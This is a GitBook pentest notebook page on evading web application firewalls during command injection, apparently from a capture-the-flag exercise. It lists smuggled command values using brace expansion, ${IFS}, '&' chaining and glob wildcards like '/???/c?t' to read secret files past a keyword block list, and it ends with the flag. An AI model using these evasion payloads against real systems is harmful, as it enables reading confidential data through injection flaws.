Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • See Also:
  • Char Evasion 'spaces'
  • WAF Wars

Was this helpful?

  1. 04 WebApps

WAF

PreviousSQLMapNextWebmin

Last updated 2 years ago

Was this helpful?

See Also:

  • ,

Char Evasion 'spaces'

{ls,-la,/root}
{cat,file.txt}
cat${IFS}file.txt

/&pwd/&pwd
/var/task&{cat,secret.py}

{/var/log/,-la}
/var/log&{cat,yum.log}
/var/log&{ls,//var/log/yum.log}
/&{cat,/var/log/yum.log}
/&{ls,-la,/home/target/}

Found this hiding behind ...  instead of . ..
{/var/task/...,-la}

WAF Wars

  • The bash shell allows wildcards.

  • These can be helpful to run commands that may be blocked by the WAF.

  • There are many functions that can manipulate text.

  • Try looking at the man pages for iconv or cut.

ls -la /secrets

$cmd = "ls -la /secrets" && $output = shell_exec($cmd);
$c=p $m=w $d=d && $output = shell_exec($c$m$d);

ls -la /secrets
/???/?s
/bin/ps

/???/?s /s?????s
"flag","f","l","a","g"
/???/??t 

$egress_ruleset = array("BLAB","{","}",
"flag","secret","password","ssn","confidential");

file
flag
password
pins
ssn

/???/??t ./pins
/???/c?t 
/???/?s         ..ls works
/???/e??o hi    ..echo works!!!
/???/c?t /s?????s/
/u??/???/?s   ..might be 'ls' ?
/u??/???/c?t   ..might be 'cat' ?
/u??/???/c?t -c1  /s????ts/????

Answer:
cut -b8-30

/u??/???/c?t -b1-5  /s????ts/????
/u??/???/c?t -b8-30  /s????ts/????

FLAG{waf_3vision_w1n}
CharEvasionTricks
WebInjections